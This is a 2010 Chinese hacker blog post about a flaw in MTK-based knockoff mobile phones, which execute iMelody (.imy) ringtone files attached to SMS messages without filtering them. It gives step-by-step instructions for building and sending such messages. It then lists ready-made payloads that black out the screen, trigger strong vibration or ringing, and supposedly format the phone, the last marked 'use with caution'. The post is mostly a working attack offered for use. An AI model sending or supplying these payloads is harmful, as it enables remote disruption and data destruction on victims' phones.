注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[MTK] 格式化 山寨手机的短信代码  

2010-03-03 15:04:00|  分类: 手机/Mobile |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

[MTK] 格式化 山寨手机的短信代码

文章作者:chovil

影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机)

且 写短信时有【“选项”——“**对象”——“我的铃声”】这一功能(大部分山寨手机都有此功能)

漏洞原理:

在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,

而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内**的铃声

由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。

所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。

通过这种方式可实现对MTK方案手机的短信攻击。

操作方式:

在电脑上新建文本文档,写入代码,保存为“imy”格式文件。

将这个文件放入手机的“Audio”文件夹内。(注意,一定是手机的“Audio”文件夹,而非内存卡上。)

用手机编辑短信,“选项”——“**对象”——“我的铃声”,选择你写的“imy”文件。

完成,发送...

代码:

黑屏代码:

BEGIN:IMELODY

BEAT:1200

MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)

END:IMELODY

猛震代码:

BEGIN:IMELODY

VERSION:1.2

FORMAT:CLASS1.0

BEAT:100

MELODY:(ledoffledonbackoffbackonvibeon@300)

END:IMELODY

振铃代码:

BEGIN:IMELODY

VERSION:1.2

FORMAT:CLASS1.0

BEAT:200

MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)

END:IMELODY

格式化代码:(慎用)

BEGIN:IMELODY

VERSION:1.2

FORMAT:CLASS1.0

COMPOSER:MTK(23)Fomat

BEAT:180

MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff

(+"@9999999999999999999999999">"++"@9999999999999999999999999)"

K8各群共享已有几分写好的IMY格式RING   但没有格式化这一项

  评论这张
 
阅读(1954)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016